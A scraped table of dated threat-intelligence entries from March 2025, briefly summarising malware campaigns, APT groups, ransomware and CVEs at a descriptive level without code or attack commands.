KoSpy is a recently discovered Android spyware that has been associated with the North Korean APT Vedalia (also known as APT37 ScarCruft). The spyware was observed masquerading as numerous utility applications to entice/trick its victims. |
||
|
14.3.25 |
Since its identification in late 2024, the Hellcat Ransomware Group has emerged as a prominent Ransomware-as-a-Service (RaaS) threat claiming attacks on critical national infrastructure and government organizations. |
|||
|
14.3.25 |
An email campaign targeting organizations in the UAE associated with aviation and satellite communications has been reported. The attack leveraged a compromised email account from an Indian electronics firm to send malicious emails aimed at luring victims. |
|||
|
14.3.25 |
Cryptojacking |
Captain MassJacker Sparrow: Uncovering the Malware’s Buried Treasure |
||
|
14.3.25 |
Rootkit |
Analyzing OBSCURE#BAT: Threat Actors Lure Victims into Executing Malicious Batch Scripts to Deploy Stealthy Rootkits |
||
|
13.3.25 |
DocSwap is a new mobile malware variant distributed under the disguise of a "document viewing authentication" mobile app. |
|||
|
13.3.25 |
A new campaign distributing scam crypto investment platforms |
A new campaign spreading fraudulent cryptocurrency investment platforms has been reported by researchers from Palo Alto. The attackers leverage websites and Android mobile apps masqueraded as known brands of retail stores, financial institutions or technology companies to lure their victims. |
||
|
13.3.25 |
CVE-2025-25181 - Advantive VeraCore SQL Injection vulnerability |
CVE-2025-25181 is a SQL Injection vulnerability affecting Advantive VeraCore, which is an order fulfillment and warehouse management software. If successfully exploited, the flaw might allow the remote attackers to execute arbitrary SQL commands via the PmSess1 parameter and gain unauthorized access to sensitive data. |
||
|
13.3.25 |
Ballista botnet targets TP-Link Archer routers via vulnerability exploitation |
A new botnet dubbed Ballista has targeted organizations in Australia, China, Mexico, and the US focusing on healthcare, manufacturing, services, and technology sectors. |
||
|
13.3.25 |
Credential Theft Campaign Disguised as Construction Quote Requests |
An actor has been running a large phishing campaign, targeting businesses with emails disguised as requests for quotations. The emails, sent from multiple Outlook, Live, Hotmail, and MSN addresses, urge recipients to review an attached document, claiming it contains the scope of work for an urgent project. |
||
|
13.3.25 |
PlayPraetor is a mobile malware recently distributed via fake Play Store websites. Many of the observed fraudulent domains leverage typo-squatting techniques to lure the unsuspecting victims into downloading the malicious binaries. |
|||
|
13.3.25 |
CVE-2024-32444 and CVE-2024-32555 - WordPress RealHome and Easy Real Estate Plugin vulnerabilities |
CVE-2024-32444 and CVE-2024-32555 are two recently disclosed vulnerabilities affecting WordPress RealHome and WordPress Easy Real Estate Plugin respectively. |
||
|
13.3.25 |
Blind Eagle (aka APT-C-36), is a threat actor group that engages in both espionage and cyber-crime. It primarily targets organizations in Colombia and other Latin American countries focusing on government institutions, financial organizations, and critical infrastructure. |
|||
|
13.3.25 |
Malvertising campaign found in pirate streaming sites leading to infostealers |
A malvertising campaign has been recently disclosed by Microsoft. The malicious actors start by injecting malvertising redirectors into videos hosted on pirate streaming sites. |
||
|
13.3.25 |
A new wave phishing is making rounds in South Korea, disguising itself as an official email from the Korean National Tax Service (NTS). The email claims to contain an electronic tax invoice and includes an HTML attachment named NTS_eTaxInvoice.html. |
|||
|
13.3.25 |
Malicious operations attributed to the EncryptHub threat actor |
EncryptHub is a new threat actor engaging in malicious operations distributing ransomware and infostealers (StealC, Rhadamanthys) to the unsuspecting victims. |
||
|
13.3.25 |
A new malicious campaign targeting the maritime and nuclear energy sector across South and Southeast Asia, the Middle East, and Africa has been attributed to the Leafperforator (also known as SideWinder) APT group. |
|||
|
13.3.25 |
Spyware |
Lookout Discovers New Spyware by North Korean APT37 |
||
|
13.3.25 |
VULNEREBILITY |
Ruby SAML allows a SAML authentication bypass due to namespace handling (parser differential) |
||
|
13.3.25 |
VULNEREBILITY |
Ruby SAML allows a SAML authentication bypass due to DOCTYPE handling (parser differential) |
||
|
13.3.25 |
VULNEREBILITY |
n out of bounds write exists in FreeType versions 2.13.0 and below (newer versions of FreeType are not vulnerable) when attempting to parse font subglyph structures related to TrueType GX and variable font files. |
||
|
13.3.25 |
GROUP |
Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - DotNetNuke |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - Zimbra Collaboration Suite |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 5.3) - VMware vCenter |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - VMware Workspace ONE UEM |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - GitLab CE/EE |
||
|
12.3.25 |
VULNEREBILITY |
CVSS score: 8.6) - GitLab CE/EE |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - GitLab CE/EE |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - ColumbiaSoft DocumentLocator |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.5) - BerriAI LiteLLM |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 8.2) - Ivanti Connect Secure |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.0) - A Windows Win32 Kernel Subsystem use-after-free (UAF) vulnerability that allows an authorized attacker to elevate privileges locally |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 4.6) - A Windows NTFS information disclosure vulnerability that allows an attacker with physical access to a target device and the ability to plug in a malicious USB drive to potentially read portions of heap memory |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - An integer overflow vulnerability in Windows Fast FAT File System Driver that allows an unauthorized attacker to execute code locally |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 5.5) - An out-of-bounds read vulnerability in Windows NTFS that allows an authorized attacker to disclose information locally |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - A heap-based buffer overflow vulnerability in Windows NTFS that allows an unauthorized attacker to execute code locally |
||
|
12.3.25 |
VULNEREBILITY |
(CVSS score: 7.0) - An improper neutralization vulnerability in Microsoft Management Console that allows an unauthorized attacker to bypass a security feature locally |
||
|
12.3.25 |
Update |
This document lists security updates and Rapid Security Responses for Apple software. |
||
|
12.3.25 |
APT |
Blind Eagle: …And Justice for All |
||
|
11.3.25 |
A new campaign distributing Poco RAT to Spanish-speaking users in Latin America has been reported in the wild. The campaign has been attributed to the Darkling APT (aka Dark Caracal). The group is known to leverage Bandook-based backdoors in their attacks. |
|||
|
11.3.25 |
CVE-2024-13159 - Ivanti Endpoint Manager (EPM) Absolute Path Traversal vulnerability |
CVE-2024-13159 is a critical (CVSS score 9.8) absolute path traversal vulnerability affecting the Ivanti Endpoint Manager (EPM) software. If successfully exploited, the flaw might allow a remote unauthenticated attacker to leak sensitive information. |
||
|
11.3.25 |
BOTNET |
Cato CTRL™ Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers |
||
|
11.3.25 |
APT |
SideWinder targets the maritime and nuclear sectors with an updated toolset |
||
|
11.3.25 |
VULNEREBILITY |
An unrestricted file upload vulnerability in Advantive VeraCore that allows a remote unauthenticated attacker to upload files to unintended folders via upload.apsx |
||
|
11.3.25 |
VULNEREBILITY |
An SQL injection vulnerability in Advantive VeraCore that allows a remote attacker to execute arbitrary SQL commands |
||
|
11.3.25 |
VULNEREBILITY |
An absolute path traversal vulnerability in Ivanti EPM that allows a remote unauthenticated attacker to leak sensitive information |
||
|
11.3.25 |
VULNEREBILITY |
An absolute path traversal vulnerability in Ivanti EPM that allows a remote unauthenticated attacker to leak sensitive information |
||
|
11.3.25 |
VULNEREBILITY |
An absolute path traversal vulnerability in Ivanti EPM that allows a remote unauthenticated attacker to leak sensitive information |
||
|
11.3.25 |
VULNEREBILITY |
Moxa’s Ethernet switch is vulnerable to an authentication bypass because of flaws in its authorization mechanism. Although both client-side and back-end server verification are involved in the process, attackers can exploit weaknesses in its implementation. |
||
|
10.3.25 |
Strela Stealer is a malware infostealer typically distributed through phishing campaigns affecting users in Italy, Germany, Spain, and Ukraine. It is designed to target specific email clients (notably Microsoft Outlook and Mozilla Thunderbird) and exfiltrate email login credentials. |
|||
|
10.3.25 |
Boramae is a new ransomware discovered just recently in the threat landscape and a suspected variant of the Beast aka BlackLockbit malware family. The malware encrypts user files and appends ".boramae" to them. |
|||
|
10.3.25 |
Phantom-Goblin is the name of a malicious infostealing campaign recently identified in the wild. The attackers responsible are leveraging social engineering techniques luring victims into execution of malicious .LNK files. |
|||
|
10.3.25 |
Desert Dexter is a recently reported malicious operation targeting users based in Middle East and North Africa. The responsible threat actors are distributing malicious binaries hosted on legitimate file-sharing portals or via seemingly harmless Telegram channels. |
|||
|
10.3.25 |
HACKING |
Polymorphic Extensions: The Sneaky Extension That Can Impersonate Any Browser Extension |
||
|
10.3.25 |
Malware |
Desert Dexter. Attacks on Middle Eastern countries |
||
|
10.3.25 |
CRYPTOCURRENCY |
Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool |
||
|
9.3.25 |
VULNEREBILITY |
Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory). |
||
|
9.3.25 |
VULNEREBILITY |
Edimax IC-7100 does not properly neutralize requests. An attacker can create specially crafted requests to achieve remote code execution on the device |
||
|
8.3.25 |
Android |
Satori Threat Intelligence Disruption: BADBOX 2.0 Targets Consumer Devices with Multiple Fraud Schemes |
||
|
8.3.25 |
PHISHING |
We’re aware that phishers have been sharing private videos to send false videos, including an AI generated video of YouTube’s CEO Neal Mohan announcing changes in monetization. |
||
|
8.3.25 |
Ransom |
Snail Mail Fail: Fake Ransom Note Campaign Preys on Fear |
||
|
8.3.25 |
Loader |
Inside Zloader’s Latest Trick: DNS Tunneling |
||
|
8.3.25 |
Stealer |
TMPN (Skuld) Stealer: The dark side of open source |
||
|
8.3.25 |
AI |
Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity |
||
|
8.3.25 |
GROUP |
(EncryptHub) is a threat actor that has come to the forefront with highly sophisticated spear-phishing attacks since 26 June 2024. In the attacks it has carried out, it exhibits a different operational strategy by carrying out all the processes necessary to obtain initial access through personalized SMS (smishing) or by calling the person directly (vishing) and tricking the victim into installing remote monitoring and management (RMM) software. |
||
|
8.3.25 |
Loader |
(a.k.a Sardonic Backdoor) is a sophisticated toolkit of the Monstrous Mantis |
||
|
7.3.25 |
Desert Dexter is a recently reported malicious operation targeting users based in Middle East and North Africa. The responsible threat actors are distributing malicious binaries hosted on legitimate file-sharing portals or via seemingly harmless Telegram channels. |
|||
|
7.3.25 |
Latest Njrat variant uses Microsoft Dev Tunnels for C2 communications |
A new variant of the NjRAT malware has been reported in the wild. NjRAT (also known as Bladabindi or Ratenjay) is an older but still widely used Remote Access Trojan (RAT). This malware is often used to extract data from the compromised endpoints, send commands via remote shell, manipulate the registry as well as download additional payloads. |
||
|
7.3.25 |
Medusa ransomware attacks jumped by 42% between 2023 and 2024. This increase in activity continues to escalate, with almost twice as many Medusa attacks observed in January and February 2025 as in the first two months of 2024. |
|||
|
7.3.25 |
A new campaign targeting ISP infrastructure with infostealers |
A new campaign targeting ISP (Internet service providers) infrastructure with infostealers and cryptocurrency miners has been reported in the wild. In the initial attack stages the threat actors are leveraging brute force attacks to access the vulnerable environments. |
||
|
7.3.25 |
Kit |
Unmasking the new persistent attacks on Japan |
||
|
7.3.25 |
VULNEREBILITY |
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions |
||
|
7.3.25 |
RANSOMWARE |
The threat actors behind the Medusa ransomware have claimed nearly 400 victims since it first emerged in January 2023, with the financially motivated attacks witnessing a 42% increase between 2023 and 2024. |
||
|
7.3.25 |
VULNEREBILITY |
Prototype pollution in Kibana leads to arbitrary code execution via a crafted file upload and specifically crafted HTTP requests. In Kibana versions >= 8.15.0 and < 8.17.1, this is exploitable by users with the Viewer role |
||
|
7.3.25 |
RAT |
Unveiling EncryptHub: Analysis of a multi-stage malware campaign |
||
|
7.3.25 |
JavaScript |
Thousands of websites hit by four backdoors in 3rd party JavaScript attack |
||
|
6.3.25 |
APT |
Silk Typhoon targeting IT supply chain |
||
|
6.3.25 |
RAT |
The evolution of Dark Caracal tools: analysis of a campaign featuring Poco RAT |
||
|
6.3.25 |
APT |
The evolution of Dark Caracal tools: analysis of a campaign featuring Poco RAT |
||
|
6.3.25 |
APT |
Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools |
||
|
5.3.25 |
In a new report, researchers at Fortinet have detailed a phishing campaign that was used to deliver Havoc malware. Havoc is a malicious framework, akin to Cobalt Strike, that is actively leveraged to compromise victims. |
|||
|
5.3.25 |
Danger & Loches - recent Globeimposter ransomware variants seen in the wild |
Dange and Loches are the two most recently identified variants of the Globeimposter ransomware family. The malware will encrypt user data and append .danger or .loches extension to the locked files respectively. |
||
|
5.3.25 |
GrassCall malware campaign spreads infostealers to job seekers |
GrassCall is a recently identified campaign attributed to the threat group known as Crazy Evil. The attack has been targeting job seekers with fake job interviews in efforts to distribute malicious executables used for infostealing. |
||
|
5.3.25 |
CVE-2024-12356 is a critical (CVSS score 9.8) command injection vulnerability affecting the BeyondTrust Privileged Remote Access (PRA) and BeyondTrust Remote Support (RS) software. If successfully exploited, the flaw might allow an unauthenticated attacker to inject commands that are run as a site user. |
|||
|
5.3.25 |
Leveraging malicious LNK files and Null-AMSI tool to deliver AsyncRAT |
A malware campaign using malicious LNK files disguised as wallpapers to lure users has been observed. As part of the attack vector, the open-source Null-AMSI tool is employed to bypass malware scanning interfaces (AMSI) and Event Tracing for Windows (ETW). |
||
|
5.3.25 |
The Winos4.0 malware framework has been used by threat groups to perpetrate attacks against intended victims. In a recent report from Fortinet, they have outlined an attack observed against users in Taiwan, using a tax related lure to distribute Winos4.0 malware. |
|||
|
5.3.25 |
Fake browser updates being distributed through malicious redirects |
Security researchers have observed recent malware campaigns utilizing web-based malware distribution via compromised sites rather than relying solely on email-based attacks to spread malicious links. |
||
|
5.3.25 |
Go |
Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS Systems |
||
|
5.3.25 |
RANSOMWARE |
Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal |
||
|
5.3.25 |
Stealer |
Qbot is Back.Connect |
||
|
5.3.25 |
VULNEREBILITY |
(CVSS score: 9.3) - A Time-of-Check Time-of-Use (TOCTOU) vulnerability that leads to an out-of-bounds write, which a malicious actor with local administrative privileges on a virtual machine could exploit to execute code as the virtual machine's VMX process running on the host |
||
|
5.3.25 |
VULNEREBILITY |
(CVSS score: 8.2) - An arbitrary write vulnerability that a malicious actor with privileges within the VMX process could exploit to result in a sandbox escape |
||
|
5.3.25 |
VULNEREBILITY |
(CVSS score: 7.1) - An information disclosure vulnerability due to an out-of-bounds read in HGFS that a malicious actor with administrative privileges to a virtual machine could exploit to leak memory from the vmx process |
||
|
5.3.25 |
Go |
Call It What You Want: Threat Actor Delivers Highly Targeted Multistage Polyglot Malware |
||
|
5.3.25 |
Infostealer |
Infostealer Campaign against ISPs |
||
|
4.3.25 |
VULNEREBILITY |
(CVSS score: 6.5) - A command injection vulnerability in the web-based management interface of Cisco Small Business RV Series routers that allows an authenticated, remote attacker to gain root-level privileges and access unauthorized data (Unpatched due to the routers reaching end-of-life status) |
||
|
4.3.25 |
VULNEREBILITY |
(CVSS score: 8.6) - An authorization bypass vulnerability in Hitachi Vantara Pentaho BA Server that stems from the use of non-canonical URL paths for authorization decisions (Fixed in August 2024 with versions 9.3.0.2 and 9.4.0.1) |
||
|
4.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - An improper resource shutdown or release vulnerability in Microsoft Windows Win32k that allows for local, authenticated privilege escalation, and running arbitrary code in kernel mode (Fixed in December 2018) |
||
|
4.3.25 |
VULNEREBILITY |
(CVSS score: 7.8) - An improper resource shutdown or release vulnerability in Microsoft Windows Win32k that allows for local, authenticated privilege escalation, and running arbitrary code in kernel mode (Fixed in December 2018) |
||
|
4.3.25 |
VULNEREBILITY |
(CVSS score: 9.8) - A path traversal vulnerability in Progress WhatsUp Gold that allows an unauthenticated attacker to achieve remote code execution (Fixed in version 2023.1.3 in June 2024) |
||
|
4.3.25 |
VULNEREBILITY |
A privilege escalation flaw in the Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories. |
||
|
4.3.25 |
VULNEREBILITY |
A privilege escalation flaw in the HID USB component of the Linux kernel that could lead to a leak of uninitialized kernel memory to a local attacker through specially crafted HID reports. |
||
|
4.3.25 |
GROUP |
JavaGhost’s Persistent Phishing Attacks From the Cloud |
||
|
4.3.25 |
Loader |
Havoc: SharePoint with Microsoft Graph API turns into FUD C2 |
||
|
4.3.25 |
VULNEREBILITY |
An arbitrary kernel memory mapping vulnerability in version 7.9.1 caused by a failure to validate user-supplied data lengths. Attackers can exploit this flaw to escalate privileges. |
||
|
4.3.25 |
VULNEREBILITY |
An arbitrary kernel memory write vulnerability in version 7.9.1 due to improper validation of user-supplied data lengths. |
||
|
4.3.25 |
VULNEREBILITY |
A null pointer dereference vulnerability in version 7.9.1 caused by the absence of a valid MasterLrp structure in the input buffer. |
||
|
4.3.25 |
VULNEREBILITY |
An arbitrary kernel memory vulnerability in version 7.9.1 caused by the memmove function, which fails to sanitize user-controlled input. |
||
|
4.3.25 |
VULNEREBILITY |
An insecure kernel resource access vulnerability in version 17 caused by failure to validate the MappedSystemVa pointer before passing it to HalReturnToFirmware. |
||
|
4.3.25 |
ALERT |
Paragon Partition Manager's BioNTdrv.sys driver, versions prior to 2.0.0, contains five vulnerabilities. |
||
|
3.3.25 |
BOTNET |
Long Live The Vo1d Botnet: New Variant Hits 1.6 Million TV Globally |
||
|
1.3.25 |
LCRYX is a VBScript-based ransomware discovered in the wild last year. The malware encrypts user data, appends ‘.lcryx’ to the locked files and demands ransom payment in the Bitcoin cryptocurrency. |
|||
|
1.3.25 |
New Squidoor backdoor variant distributed in latest campaigns |
Squidoor is a modular multi-platform backdoor variant supporting both Windows and Linux platforms. According to the researchers from Palo Alto, the newest strain of this malware is distributed in attacks associated with suspected Chinese threat actors. |
||
|
1.3.25 |
In Japan, the Bank of Yokohama is the largest regional bank headquartered in Yokohama. |
|||
|
1.3.25 |
Billbug (aka Lotus Blossom) threat group uses Sagerunex malware to target numerous victims |
The Billbug (aka Lotus Blossom) threat group has been observed leveraging Sagerunex malware, along with other hacking tools, to target numerous victims across industries. |
||
|
1.3.25 |
VULNEREBILITY |
(CVSS score: N/A) - An out-of-bounds access vulnerability for Extigy and Mbox devices |
||
|
1.3.25 |
VULNEREBILITY |
(CVSS score: 5.5) - A use of an uninitialized resource vulnerability that could be used to leak kernel memory |
||